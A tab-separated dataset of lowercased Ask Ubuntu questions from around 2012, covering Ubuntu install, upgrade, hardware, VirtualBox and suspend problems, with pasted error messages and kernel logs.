144780	virtual box wo n't accept .iso to install os	i am trying to install a virtual machine , and every time i select the installation media i get this error : failed to open the cd/dvd image /home/jesse/documents/microsoft windows distribution iso archive/microsoft.windows.xp.professional.iso . could not get the storage format of the medium '/home/jesse/documents/microsoft windows distribution iso archive/microsoft.windows.xp.professional.iso ' ( verr_not_supported ) . result code : vbox_e_iprt_error ( 0x80bb0005 ) component : medium interface : imedium { 53f9cc0c-e0fd-40a5-a404-a7a5272082cd } callee : ivirtualbox { c28be65f-1a8f-43b4-81f1-eb60cb516e66 } i would like too know how to fix this annoying error .
144783	how do i change the shortcut key to launch the dash	i 'm using a logitech cordless mediaboard and since it does n't have a win key , i need to change the shortcut for launching the dash . i 'm not looking to assign alt gr as win key or any other key . i want to change the shortcut key to launch the dash , for example alt+z or alt gr thanks
144785	ca n't install sdl-1.2.15 on ubuntu 12.04	having real trouble installing sdl-1.2.15 on the latest version of ubuntu . http : //www.linuxfromscratch.org/blfs/view/svn/multimedia/sdl.html the install guide that comes with the tar file says that i need to start by calling the configure file . looking at the comments , this seems to be needed to create a makefile with which to compile the library . so , as advised , i start by typing : sudo ./configure to which i get the following error message : sudo : ./configure : command not found now , i 've got ubuntu set up to show executable files as red in the terminal window , and the configure file does not appear to be executable . so i 'm confused . any ideas what 's wrong ?
144792	how to stop my 12.04 randomly loging me out ?	after upgrading from 11.10 to 12.04 i find i am randomly logged out while i am working . i have no idea why this is happening . can anyone suggest why this is happening and perhaps a method to fix this most unproductive of issues ? thanks .
144797	ca n't get past the login screen	using a brand-new install to a usb stick of 12.04 lts installed by universal usb installer 1.8.9.8 . i log in as `` ubuntu '' with a blank password , the console appears for a second or two with text scrolling past and then it returns to the login page . i 've used the same usb stick on several computers with the same results , so it does n't appear to be a hardware/driver issue . i have not tried installing to the hard drive , because i wanted to try it out first .
144803	getting window maximization to work properly with tint2	i 've added a bottom taskbar to unity with tint2 . now i have the taskbar on the bottom of my screen as desired , but when i maximize windows their bottom edge sits under the taskbar that tint2 created . how do i tell unity that the bottom x pixels are off-limits ?
144805	how long to wait before humble bundle games appear in software centre ?	at software-center.ubuntu.com it says thank you for downloading your humble bundle games from the ubuntu software center notes : as these games have been recently added to ubuntu software center it might take a minute for them to appear . if you see a `` not found '' message , ubuntu software center is working in the background to update the list of available apps . when i click on a link , the software centre opens and it says there isn’t a software package called “swordandsworcery” in your current software sources . i have waited for about 30 minutes now . i have also executed sudo apt-get update & restarted software centre to no avail . do i keep waiting ?
144809	can i resize my partitions ?	the following is a screenshot of my current partitions , shown by gparted : note that the partitions on the right of /dev/sda3 , without labels on them in the figure , are /dev/sda6 ( for /home ) , /dev/sda7 ( for / ) , unallocated , and /dev/sda5 ( for swap ) , from left to right , taken together , constitute the contents of the extended partition /dev/sda4 . i would like to resize the partitions , such that some unused space from /dev/sda7 ( for / ) and the small unallocated space can be moved to /dev/sda3 ( for /windows-d ) and make it larger . if this is possible , how can i do it ?
144811	which version of openmp implements gcc 4.5 ?	i am using ubuntu 11.04 . i have installed the compiler gcc 4.5 by using the command sudo apt-get install gcc 4.5 in terminal . now i need the command to enable openmp . is it gcc -fopenmp foo.c ? @ pl1nk i started from the beginning : 1st step= > sudo apt-get install build-essential 2nd step= > sudo apt-get install gcc 4.5 and now the output of gcc -v is : **ubuntu @ ubuntu : ~ $ gcc -v using built-in specs . collect_gcc=gcc collect_lto_wrapper=/usr/lib/i386-linux-gnu/gcc/i686-linux-gnu/4.5.2/lto-wrapper target : i686-linux-gnu configured with : ../src/configure -v -- with-pkgversion='ubuntu/linaro 4.5.2-8ubuntu4 ' -- with-bugurl=file : ///usr/share/doc/gcc-4.5/readme.bugs -- enable-languages=c , c++ , fortran , objc , obj-c++ -- prefix=/usr -- program-suffix=-4.5 -- enable-shared -- enable-multiarch -- with-multiarch-defaults=i386-linux-gnu -- enable-linker-build-id -- with-system-zlib -- libexecdir=/usr/lib/i386-linux-gnu -- without-included-gettext -- enable-threads=posix -- with-gxx-include-dir=/usr/include/c++/4.5 -- libdir=/usr/lib/i386-linux-gnu -- enable-nls -- with-sysroot=/ -- enable-clocale=gnu -- enable-libstdcxx-debug -- enable-libstdcxx-time=yes -- enable-plugin -- enable-gold -- enable-ld=default -- with-plugin-ld=ld.gold -- enable-objc-gc -- enable-targets=all -- disable-werror -- with-arch-32=i686 -- with-tune=generic -- enable-checking=release -- build=i686-linux-gnu -- host=i686-linux-gnu -- target=i686-linux-gnu thread model : posix gcc version 4.5.2 ( ubuntu/linaro 4.5.2-8ubuntu4 ) ** in few words the same results ... . what should i do now ?
144815	ubuntu server upgrade 11.04 to 11.10 fails	i 'm actually trying to upgrade my ubuntu 11.04 server to 12.04 , but i have to go through 11.10 first , right ? well , do-release-upgrade is failing miserably . here is the output , with duplicate lines and such removed ( still > 1500 lines ) : http : //paste.ubuntu.com/1018546/ yeah . i found this question , which seems to mention similar errors , but i 've tried all of the suggestions given there and nothing has changed . i tried running apt-get dist-upgrade ; it churned for a while and eventually came back with `` unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? '' ran apt-get update and got much the same kinds of error messages i got from do-release-upgrade . the following are samples of the outputs that raise my eyebrow ( line numbers reference the pastebin code ) : ign http : //us.archive.ubuntu.com natty inrelease ( e.g . line 43 ) -- do n't know if this is a problem or not , but it shows up frequently err http : //security.ubuntu.com natty-security/restricted amd64 packages ( e.g . line 101 ) bzip2 : ( stdin ) is not a bzip2 file . ( e.g . line 117 ) 404 not found [ ip : 91.189.92.167 80 ] ( e.g . line 199 ) -- when this occurs , it always occurs after one of the err lines updating repository information warning : failed to read mirror file ( e.g . lines 580-81 ) e.g . lines 1045-52 : bzip2 : data integrity error when decompressing . input file = ( stdin ) , output file = ( stdout ) it is possible that the compressed file ( s ) have become corrupted . you can use the -tvv option to test integrity of such files . you can use the `bzip2recover ' program to attempt to recover data from undamaged sections of corrupted files . and the summary of the whole train wreck can be found in lines 1520-65 . any ideas/suggestions/solutions ? ( the bzip2 errors particularly confuse me . it looks like it 's trying to decompress from stdin ? is it supposed to do that ? ) should i try downloading & upgrading from the iso instead ? ( edit : iso upgrade failed too . ) i 'm glad to provide any further information i 've forgotten . tia !
144826	unable to add ppa , help needed ?	when i typed this command in the terminal : sudo add-apt-repository ppa : noobslab/icons i got the following error . please help . traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 125 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 80 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 7 , `` could n't connect to host '' )
144832	auto power on and off	i have a old laptop set up as a media server with ubuntu 12.04 on it . i was wondering whether it was possible to set a time for it to automatically turn off at night and then in the morning automatically turn on . i know the auto off is possible using ktimer but i do not know how to set an auto on time ... if this is not possible , i guess the next best thing would be to have it go into suspend and then somehow set a time for it to wake up ... thanks for the help , leinardo
144839	what do i need to do to start working with launchpad again on a new computer ?	i have followed the directions listed at http : //developer.ubuntu.com/packaging/html/getting-set-up.html to get my desktop computer set up so that i could work on bug fixing during 12.04 's development . now i am trying to get set up again on my laptop computer ( different machine ) so i can help contribute to ask ubuntu badge integration with the ubuntu accomplishments system . however , when i try to run the first command listed to do a bzr branch , i get the following error in my terminal : permission denied ( publickey ) . connectionreset reading response for 'bzrdir.open_2.1 ' , retrying permission denied ( publickey ) . bzr : error : connection closed : unexpected end of message . please check connectivity and permissions , and report a bug if problems persist . what do i need to do to get set up and ready to work again on a new machine ? should i just follow all the steps in the first link again ( even though they seem to assume it 's your first time getting set up with launchpad ) ? or are there steps i should skip / do differently ? note : i do not have access to my original desktop machine at this time .
144842	designing theme and interface	i would like to know how can i create a theme for ubuntu . i want to base my work on gnome shell . but the main point is buttons and elements are optimized for both mouse input and touch screen . i think we 'll see a lot of devices with touch input by the time windows 8 is released . so i like to make a competitor for win 8 and metro ui in linux world . but it would be different . i do n't know if i can make it , because i do n't know much about coding and programming . i just want to know how i can make a new interface . what do i need to do and know . please help me . thanks .
144846	ubuntu boots to orange screen after install	i have a problem in which i boot my computer and everything works normally , i see a purple screen with various partitions to select such as my windows 7 and ubuntu partitions . when i select the ubuntu one , my computer boots to an orangish screen and plays what sounds like a drum sound once . then nothing happens and i have to reboot my computer because the computer is stuck at this orange screen . my hardware is : asus m5a97 motherboard amd phenom ii 630 processor msi r6670 md1gd5 gpu trendnet tew-641pc wireless card
144847	how to auto-install runlevel control for existing service/daemon ?	need to install a service/daemon ( in this case bind9 , a dns service ) runlevel control , aka `` rc '' control ( /etc/rc*.d and such ) . bind9 came pre-installed on my 11.04 system , but without aforementioned runlevel control . how to easily ( and preferably automatically ) install the rc stuff for `` compliant '' services/daemons in /etc/init.d ?
144852	help me i ca n't format my usb ? i have already tried with mkdosfs and gparted	i have a microsd card in a usb adapter ( which plugs into a usb port on my machine , and acts like a usb flash drive ) . i was using unetbootin to make this a bootable usb flash drive with kubuntu . but i needed to cancel while it was working . so i killed the unetbootin process from the console . since then , i ca n't format the microsd or delete the folder that kubuntu made . i have also tried mkdosfs , with no success . i ca n't mount the drive anymore either ? what can i do , to make this drive usable again ? trying to create a new partition table in gparted , as described in eliah kagan 's answer , does not work . it fails with the error message `` imposible crear tabla de particiones '' ( `` unable to create a partition table '' ) .
144855	update package manager failed , e : type `` ain ''	the update manager failed and gave me this error : e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/scopes-packagers-ppa-precise.list what should i do ? this message came up when i followed the editor 's instructions : $ cat /etc/apt/sources.list.d/scopes-packagers-ppa-precise.list # deb http : //ppa.launchpad.net/scopes-packagers/ppa/ubuntu precise main # deb-src http : //ppa.launchpad.net/scopes-packagers/ppa/ubuntu precise main ain $
144860	can not view , use , or open cds or dvds in ubuntu 12.04	i am fairly new to ubuntu 12.04 and i have encountered a rather irritating problem . whenever i insert a cd or dvd ( whether it have data , music , movies , or nothing at all ) , nothing pops up saying `` you have inserted a cd '' , `` play with rhythmbox ? '' etc . it does n't show the cd in the launcher/dock or anything of the sort . this is especially peculiar because not only do i have a standard ide built-in optical drive , but i have an external usb optical drive . neither work . in addition , whenever i go to `` computer/// '' and i click ( double click , right click , or even left click ) on `` cd/dvd drive '' nothing happens , when i right click and select `` open '' nothing happens either [ for either of the two drives ( both are listed in computer/// ) ] and if i insert a blank disk and go to a disk burning program such as brasero , and try to burn to the drive it detects no cds or dvds of any kind . i 'm rather stumped and ca n't seem to find a question similar to this . : ( thanks for all your help in advance ! ! : ) ~preston output of sudo lshw *-cdrom description : dvd-ram writer product : cd/dvdw ts-h652m vendor : tsstcorp physical id : 0.0.0 bus info : scsi @ 5:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : 0414 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc *-cdrom description : dvd reader product : dvd writer 300n vendor : hp physical id : 0.0.0 bus info : scsi @ 4:0.0.0 logical name : /dev/cdrom2 logical name : /dev/cdrw2 logical name : /dev/dvd2 logical name : /dev/sr1 version : 1.25 serial : [ capabilities : removable audio cd-r cd-rw dvd configuration : status=nodisc
144861	installing gcc in ubuntu 11.10	i want to install gcc on my computer . to do this , i ran the following command : sudo apt-get install build-essential as this runs , it connects ( or tries to connect ) to the server tw.archive.ubuntu.com . but the server is not working . how can i fix this and get gcc installed ? note : the taiwan mirror is down as of 2012-06-01 0352 . see thread here . this pastebin contains the text of /etc/apt/sources.list , after changing from tw.archive.ubuntu.com to the main server .
144863	unity greeter background on xubuntu 12.04	i 'm running xubuntu 12.04 and using the unity greeter with lightdm . everything works well except for i can never change the background . i 've tried editing the .conf file , editing the gsettings as the lightdm user , even compiling an override file for com.canonical.unity-greeter . all of these fail , and i end with a dark purple background . i was able to get rid of the grid using gsettings , but that 's about it . i 've enabled switching user backgrounds , but that never works . i 'm wondering whether this is xfce/xubuntu specific , or a bug .
144867	unable to to view power statistics box in ubuntu 12.04	power statistics box can not be viewed the second time it is tried to open . the box just shows blank.it does n't appear even if left open for sometime .
144868	how do i change the default server used by the live-cd for updates while installing ubuntu 12.04 ?	the default server for taiwan tw.archive.ubuntu.com has been down for a while . so many newbies asked in http : //www.ubuntu-tw.org why they could not install ubuntu 12.04 lts successfully ? is it hard to change the default download and update server when one install ubuntu with live cd ? where can we report this serious and urgent default server failure ? please see this forum thread for reference .
144877	how do i enable hibernation on wubi ?	i installed ubuntu on my windows 7 sager laptop using wubi . hibernate ( i.e . suspend to disc ) is not an option from the power icon , only suspend , shutdown , etc . hibernate is also not an option from my battery/lid close options . i understand that hibernation is disabled by default in ubuntu 12.04 . i tried running pm-hibernate but i get the following message : looking for splash system ... none s2disk : snapshotting system and then the computer just hangs with a black screen . according to the documentation here if this fails then i ca n't enable hibernate but it offers no help in making pm-hibernate succeed . could swap be my problem ? it looks like i have very small swap : user @ ubuntu : ~ $ cat /proc/swaps filename type size used priority /host/ubuntu/disks/swap.disk file 262140 0 -1 the advice on swapfaq is only for the author 's set up ( e.g . i do n't have an ubuntu install disk since i used wubi ) and he says that 'info : this will not work for 12.04 , resume from hibernate work differently in 12.04 . ' any advice ? i really need to get hibernate working to use my laptop as a , er , laptop . thanks
144884	wubi on windows 8 without secure boot ?	i have a macbook pro . i 've heard rumours that if windows 8 is going to have this thing called `` secure boot '' , wubi can not work . at first i plan to install ubuntu on my mac via wubi ( and windows via bootcamp ) , but since i ca n't find my windows 7 installation cd , i installed windows 8 on my mac and installed ubuntu on a vm . then suddenly windows 8 release preview was released so i decided to install over my existing copy of windows 8 consumer preview . when i went to the windows 8 upgrade assistant , it said that the firmware on my mac does n't support secure booting . i do n't even know what it means , but since the upgrade assistant said that the mac can not support secure booting , can i install wubi successfully ? and what is secure booting anyways ? any help will be appreciated .
144892	redirect stdout and stderr to separate screens with dual monitors	in ubuntu , how to dedirect stdout and stderr to separate screens with dual monitors ?
144894	add physical disk to kvm virtual machine	i 'm setting up a file server ( nas4free ) as a kvm virtual machine on a ubuntu server 12.04 system . how do i add physical hard drives directly to the vm so they can be used by the guest ( nas4free ) , but not the host ? specifically the hard drive i 'd like to mount is /dev/sda ( which is not currently mounted on the server . ) so far i 've found two solutions but i have n't gotten either to work . the first is from server fault where it 's suggested to use virt-manager . i have n't gotent this to work because when i try to select an existing drive nothing is being listed . my best guess as to why this is , is because i 'm using virt-manager over ssh and not connecting as root , should that make a difference ? the second solution i 've found here is to just run the command ( modified for my system ) qm set nas4free -virtio /dev/sda but that seems to require proxmox which i do n't have installed and does n't seem to be in the default repositories ? finally , once the above is sorted out and i can mount the drive directly to the vm , does anyone have an experience with whether the drive should be mounted to the vm as scsi , ide , or virtio ? ( i know virtio was recommend in the linked serverfault page , but i had n't heard of it before now since i mainly use vmware ) . thanks for your help ! ! !
144895	clocks for multiple timezones in gnome 3.4 ( ubuntu 12.04 )	i looked everywhere but i could n't find a way to display multiple clocks in gnome 3.4 that ships with ubuntu 12.04 . in classic gnome and unity , it is possible . also , for some strange reason , additional timezones can not be added to the clock using the time-date applet in classic gnome . any solutions ?
144898	what spelling dictionaries does ubuntu use ?	do all applications use the same dictionary for spell checking ? if not , which applications use which dictionaries in a typical desktop installation , or where can i find out ?
144905	virtualbox windows key pass through to gnome	i use a virtualbox windows 7 guest in seamless mode on an ubuntu 12.04 linux host running gnome 3 . under normal operation when virtualbox is not running , pressing the windows key on the keyboard launches the gnome activity panel . when the windows guest is running and is in the foreground , pressing the windows key opens the windows menu inside the guest . is there anyway to configure it so that the windows key will be ignored by the guest , and passed through to the host ?
144909	if i do n't use kde why does updating download lots of kde packages ?	i have the following environments installed- gnome ( ne , classic , normal ) unity ( 3d,2d ) cinnamon enlightment cairo ( all combinations ) there is no kde . but i still got more than 90mb of kde updates . and i do n't see any suspicious repo or ppa . how can i find out which repo is giving me this so that i can purge or atleast unmark it for not updating ?
144915	`` limbo '' game has no sound	i just bought a game called limbo in humble bundle v. the site says that all games are cross-platform but in my computer the game has no sound . i 've searched in google and looked in the official faq , but none of them helped me . how can i fix this ?
144918	ca n't find ubuntu 12.04 on boot menu	so i installed ubuntu 12.04 alongside windows xp on my netbook via a usb ( since it does n't have a dvd/cd drive ) . at the end of the installation , i got an error saying the bootloader could n't be installed , but i selected the hard drive and everything seemed ok . however , whenever i turn on the computer , it goes straight to windows xp . and when i go to the os selection screen during startup , ubuntu is not there . i heard that you can fix this problem through booting up ubuntu again with the flash drive . however , when i boot through the flash drive , it gives me the options of trying without installing , installing , etc . i really have no idea where to go from here , can anyone please help out ? thanks !
144921	how to get chmod ( octal ) permissions of the folder in the terminal ?	i can look in properties of this folder but i want to get properties fast and in digits ( octal , e.g . 755 , etc . ) what am i to type in terminal to know the chmod of the file or folder i want ?
144923	still no wireless after b43 with dell inspiron 1525 ( ubuntu 12.04 )	so i followed the instructions here http : //ubuntuforums.org/showthread.php ? t=1974006 about how to solve this issue . it worked for a bit and then stopped . after doing a modprobe i could at least see my network and click on it but it would not connect ( i can always see it if i look under the listed wireless networks under vpn connections , however ) . i 'm thinking , from what i read at least , the issue might be that my wireless switch was on during those first steps . do i now have to undo the b43 install and do it again ? or is there something else i could try ? i just made the switch to linux yesterday , so i am hesitant at this point to mess with anything on my own . i should note now that it was installed by someone who knows what they are doing , so we are all good on that front .
144926	mobile broadband not enable ( evdo )	i have upgraded my ubuntu with 11.10 i368 , after completion of installation i have connected my evdo card and configured all mobile broadband setting . at first it got connected and was able to surf properly ... .but after completion of installation and updating all packages ( its was like 414 packages to download ) i was no more able setup my broadband connection with evdo . i always enable the mobile broadband before conneting , but still i was unable to connect my evdo . any solution ? ? ? ?
144932	why does my laptop resume immediately after suspend ?	i seem to be having some problem with suspend mode . every time i try to suspend my laptop , it just locks the screen . or maybe it successfully suspends just to resume only an instant after . what could cause such a behaviour ? i 'm running 32-bit ubuntu 12.04 with the 3.2.0-25 kernel on a hp dv5-1178er pavilion laptop ( intel core 2 duo ) . here are the relevant log sections : kern.log : jun 1 10:42:21 igor-laptop kernel : [ 2225.131171 ] pm : syncing filesystems ... done . jun 1 10:42:21 igor-laptop kernel : [ 2225.141222 ] pm : preparing system for mem sleep jun 1 10:42:21 igor-laptop kernel : [ 2225.141239 ] freezing user space processes ... ( elapsed 0.01 seconds ) done . jun 1 10:42:21 igor-laptop kernel : [ 2225.156171 ] freezing remaining freezable tasks ... ( elapsed 0.01 seconds ) done . jun 1 10:42:21 igor-laptop kernel : [ 2225.172139 ] pm : entering mem sleep jun 1 10:42:21 igor-laptop kernel : [ 2225.172169 ] suspending console ( s ) ( use no_console_suspend to debug ) jun 1 10:42:21 igor-laptop kernel : [ 2225.172895 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache jun 1 10:42:21 igor-laptop kernel : [ 2225.181767 ] sd 0:0:0:0 : [ sda ] stopping disk jun 1 10:42:21 igor-laptop kernel : [ 2225.251089 ] ene_ir 00:0a : wake-up capability enabled by acpi jun 1 10:42:21 igor-laptop kernel : [ 2225.251115 ] i8042 aux 00:09 : wake-up capability disabled by acpi jun 1 10:42:21 igor-laptop kernel : [ 2225.251133 ] i8042 kbd 00:08 : wake-up capability enabled by acpi jun 1 10:42:21 igor-laptop kernel : [ 2225.251286 ] jmb38x_ms 0000:06:00.3 : pci int a disabled jun 1 10:42:21 igor-laptop kernel : [ 2225.252491 ] sdhci-pci 0000:06:00.1 : pci int a disabled jun 1 10:42:21 igor-laptop kernel : [ 2225.264130 ] uhci_hcd 0000:00:1d.2 : pci int d disabled jun 1 10:42:21 igor-laptop kernel : [ 2225.264142 ] uhci_hcd 0000:00:1d.1 : pci int b disabled jun 1 10:42:21 igor-laptop kernel : [ 2225.264325 ] uhci_hcd 0000:00:1a.1 : pci int b disabled jun 1 10:42:21 igor-laptop kernel : [ 2225.288059 ] uhci_hcd 0000:00:1a.0 : pci int a disabled jun 1 10:42:21 igor-laptop kernel : [ 2225.288097 ] uhci_hcd 0000:00:1d.3 : pci int c disabled jun 1 10:42:21 igor-laptop kernel : [ 2225.288135 ] uhci_hcd 0000:00:1d.0 : pci int a disabled jun 1 10:42:21 igor-laptop kernel : [ 2225.316051 ] ehci_hcd 0000:00:1d.7 : pci int a disabled jun 1 10:42:21 igor-laptop kernel : [ 2225.316068 ] ehci_hcd 0000:00:1a.7 : pci int d disabled jun 1 10:42:21 igor-laptop kernel : [ 2225.522872 ] pm : suspend of drv : sd dev:0:0:0:0 complete after 349.979 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.522901 ] pm : suspend of drv : scsi dev : target0:0:0 complete after 349.955 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.522927 ] pm : suspend of drv : scsi dev : host0 complete after 272.260 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.522969 ] ahci 0000:00:1f.2 : bios update required for suspend/resume jun 1 10:42:21 igor-laptop kernel : [ 2225.522976 ] pci_legacy_suspend ( ) : ahci_pci_device_suspend+0x0/0x80 returns -5 jun 1 10:42:21 igor-laptop kernel : [ 2225.522981 ] pm_op ( ) : pci_pm_suspend+0x0/0x110 returns -5 jun 1 10:42:21 igor-laptop kernel : [ 2225.522984 ] pm : suspend of drv : ahci dev:0000:00:1f.2 complete after 258.932 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.522987 ] pm : device 0000:00:1f.2 failed to suspend async : error -5 jun 1 10:42:21 igor-laptop kernel : [ 2225.576228 ] snd_hda_intel 0000:00:1b.0 : pci int a disabled jun 1 10:42:21 igor-laptop kernel : [ 2225.576270 ] acpi handle has no context ! jun 1 10:42:21 igor-laptop kernel : [ 2225.592136 ] pm : suspend of drv : snd_hda_intel dev:0000:00:1b.0 complete after 327.889 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.592206 ] pm : some devices failed to suspend jun 1 10:42:21 igor-laptop kernel : [ 2225.592291 ] uhci_hcd 0000:00:1a.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 jun 1 10:42:21 igor-laptop kernel : [ 2225.592298 ] uhci_hcd 0000:00:1a.0 : setting latency timer to 64 jun 1 10:42:21 igor-laptop kernel : [ 2225.592325 ] usb usb3 : root hub lost power or was reset jun 1 10:42:21 igor-laptop kernel : [ 2225.592339 ] uhci_hcd 0000:00:1a.1 : pci int b - > gsi 21 ( level , low ) - > irq 21 jun 1 10:42:21 igor-laptop kernel : [ 2225.592345 ] uhci_hcd 0000:00:1a.1 : setting latency timer to 64 jun 1 10:42:21 igor-laptop kernel : [ 2225.592371 ] usb usb4 : root hub lost power or was reset jun 1 10:42:21 igor-laptop kernel : [ 2225.592387 ] ehci_hcd 0000:00:1a.7 : pci int d - > gsi 19 ( level , low ) - > irq 19 jun 1 10:42:21 igor-laptop kernel : [ 2225.592395 ] ehci_hcd 0000:00:1a.7 : setting latency timer to 64 jun 1 10:42:21 igor-laptop kernel : [ 2225.592843 ] uhci_hcd 0000:00:1d.0 : pci int a - > gsi 20 ( level , low ) - > irq 20 jun 1 10:42:21 igor-laptop kernel : [ 2225.592851 ] uhci_hcd 0000:00:1d.0 : setting latency timer to 64 jun 1 10:42:21 igor-laptop kernel : [ 2225.592854 ] uhci_hcd 0000:00:1d.1 : pci int b - > gsi 19 ( level , low ) - > irq 19 jun 1 10:42:21 igor-laptop kernel : [ 2225.592863 ] uhci_hcd 0000:00:1d.1 : setting latency timer to 64 jun 1 10:42:21 igor-laptop kernel : [ 2225.592878 ] usb usb5 : root hub lost power or was reset jun 1 10:42:21 igor-laptop kernel : [ 2225.592892 ] usb usb6 : root hub lost power or was reset jun 1 10:42:21 igor-laptop kernel : [ 2225.592895 ] uhci_hcd 0000:00:1d.2 : pci int d - > gsi 16 ( level , low ) - > irq 16 jun 1 10:42:21 igor-laptop kernel : [ 2225.592903 ] uhci_hcd 0000:00:1d.2 : setting latency timer to 64 jun 1 10:42:21 igor-laptop kernel : [ 2225.592906 ] uhci_hcd 0000:00:1d.3 : pci int c - > gsi 18 ( level , low ) - > irq 18 jun 1 10:42:21 igor-laptop kernel : [ 2225.592915 ] uhci_hcd 0000:00:1d.3 : setting latency timer to 64 jun 1 10:42:21 igor-laptop kernel : [ 2225.592930 ] usb usb7 : root hub lost power or was reset jun 1 10:42:21 igor-laptop kernel : [ 2225.592946 ] usb usb8 : root hub lost power or was reset jun 1 10:42:21 igor-laptop kernel : [ 2225.592949 ] ehci_hcd 0000:00:1d.7 : pci int a - > gsi 20 ( level , low ) - > irq 20 jun 1 10:42:21 igor-laptop kernel : [ 2225.592957 ] ehci_hcd 0000:00:1d.7 : setting latency timer to 64 jun 1 10:42:21 igor-laptop kernel : [ 2225.592963 ] pci 0000:00:1e.0 : setting latency timer to 64 jun 1 10:42:21 igor-laptop kernel : [ 2225.597106 ] sd 0:0:0:0 : [ sda ] starting disk jun 1 10:42:21 igor-laptop kernel : [ 2225.608138 ] snd_hda_intel 0000:00:1b.0 : bar 0 : set to [ mem 0xdf300000-0xdf303fff 64bit ] ( pci address [ 0xdf300000-0xdf303fff ] ) jun 1 10:42:21 igor-laptop kernel : [ 2225.608180 ] snd_hda_intel 0000:00:1b.0 : restoring config space at offset 0xf ( was 0x100 , writing 0x10b ) jun 1 10:42:21 igor-laptop kernel : [ 2225.608233 ] snd_hda_intel 0000:00:1b.0 : restoring config space at offset 0x3 ( was 0x0 , writing 0x10 ) jun 1 10:42:21 igor-laptop kernel : [ 2225.608248 ] snd_hda_intel 0000:00:1b.0 : restoring config space at offset 0x1 ( was 0x100000 , writing 0x100002 ) jun 1 10:42:21 igor-laptop kernel : [ 2225.608299 ] snd_hda_intel 0000:00:1b.0 : pci int a - > gsi 22 ( level , low ) - > irq 22 jun 1 10:42:21 igor-laptop kernel : [ 2225.608313 ] snd_hda_intel 0000:00:1b.0 : setting latency timer to 64 jun 1 10:42:21 igor-laptop kernel : [ 2225.608420 ] snd_hda_intel 0000:00:1b.0 : irq 50 for msi/msi-x jun 1 10:42:21 igor-laptop kernel : [ 2225.612095 ] firewire_ohci 0000:06:00.0 : restoring config space at offset 0x1 ( was 0x100000 , writing 0x100006 ) jun 1 10:42:21 igor-laptop kernel : [ 2225.612181 ] sdhci-pci 0000:06:00.1 : restoring config space at offset 0x1 ( was 0x100003 , writing 0x100007 ) jun 1 10:42:21 igor-laptop kernel : [ 2225.612211 ] sdhci-pci 0000:06:00.1 : pci int a - > gsi 16 ( level , low ) - > irq 16 jun 1 10:42:21 igor-laptop kernel : [ 2225.612225 ] sdhci-pci 0000:06:00.1 : setting latency timer to 64 jun 1 10:42:21 igor-laptop kernel : [ 2225.612296 ] jmb38x_ms 0000:06:00.3 : restoring config space at offset 0x1 ( was 0x100003 , writing 0x100007 ) jun 1 10:42:21 igor-laptop kernel : [ 2225.612326 ] jmb38x_ms 0000:06:00.3 : pci int a - > gsi 16 ( level , low ) - > irq 16 jun 1 10:42:21 igor-laptop kernel : [ 2225.612332 ] jmb38x_ms 0000:06:00.3 : setting latency timer to 64 jun 1 10:42:21 igor-laptop kernel : [ 2225.699170 ] pm : resume of drv : uvcvideo dev:2-4:1.0 complete after 101.965 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.699179 ] pm : resume of drv : uvcvideo dev:2-4:1.1 complete after 101.932 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.699186 ] pm : resume of drv : dev : ep_00 complete after 101.917 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.699197 ] pm : resume of drv : dev : ep_83 complete after 101.972 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.716148 ] pm : resume of drv : hub dev:3-0:1.0 complete after 119.543 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.716155 ] pm : resume of drv : dev : ep_00 complete after 119.544 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.716161 ] pm : resume of drv : hub dev:5-0:1.0 complete after 119.420 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.716168 ] pm : resume of drv : dev : ep_00 complete after 119.381 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.716174 ] pm : resume of drv : hub dev:8-0:1.0 complete after 119.141 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.716181 ] pm : resume of drv : dev : ep_00 complete after 119.104 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.716186 ] pm : resume of drv : dev : ep_81 complete after 119.579 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.716191 ] pm : resume of drv : dev : ep_81 complete after 119.427 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.716197 ] pm : resume of drv : dev : ep_81 complete after 119.143 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.747148 ] firewire_core : skipped bus generations , destroying all nodes jun 1 10:42:21 igor-laptop kernel : [ 2225.776093 ] pm : resume of drv : hp_accel dev : hpq0004:00 complete after 167.225 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.777243 ] i8042 kbd 00:08 : wake-up capability disabled by acpi jun 1 10:42:21 igor-laptop kernel : [ 2225.777278 ] ene_ir 00:0a : wake-up capability disabled by acpi jun 1 10:42:21 igor-laptop kernel : [ 2225.820100 ] pm : resume of drv : hub dev:4-0:1.0 complete after 223.436 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.820115 ] pm : resume of drv : dev : ep_00 complete after 223.444 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.820123 ] pm : resume of drv : dev : ep_81 complete after 223.456 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.820206 ] pm : resume of drv : hub dev:7-0:1.0 complete after 223.266 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.820221 ] pm : resume of drv : dev : ep_81 complete after 223.260 msecs jun 1 10:42:21 igor-laptop kernel : [ 2225.820238 ] pm : 